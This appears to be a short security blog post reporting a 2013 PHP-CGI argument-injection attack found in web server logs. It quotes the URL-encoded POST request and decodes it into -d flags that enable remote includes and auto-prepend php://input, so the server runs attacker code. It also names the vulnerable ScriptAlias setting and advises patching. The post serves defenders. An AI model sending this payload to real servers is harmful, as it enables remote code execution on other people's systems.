While reviewing web server logs recently, I spotted the following attack…
216.237.113.27 – - [07/Aug/2013:08:12:14 -0400] “POST
/%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F
%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D
%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+
%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F
%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75
%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E
%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61
%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D
%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1″
404 209 “-” “-”
Which decodes to:
/phppath/php?-d allow_url_include=on -d safe_mode=off
-d suhosin.simulation=on -d disable_functions=”" -d
open_basedir=none -d auto_prepend_file=php://input -n
One aspect of a vulnerable deployment includes an Apache configuration utilizing the following ScriptAlias configuration:
ScriptAlias /phppath/ “/usr/bin/”
For those running Plesk or others with the above configuration, it is recommended that your system be patched accordingly. Check the references below for more detailed information regarding this vulnerability.
References
Disclaimer
This blog is posted for informational purposes only. Extensive testing is recommended prior to implementing changes discussed here.
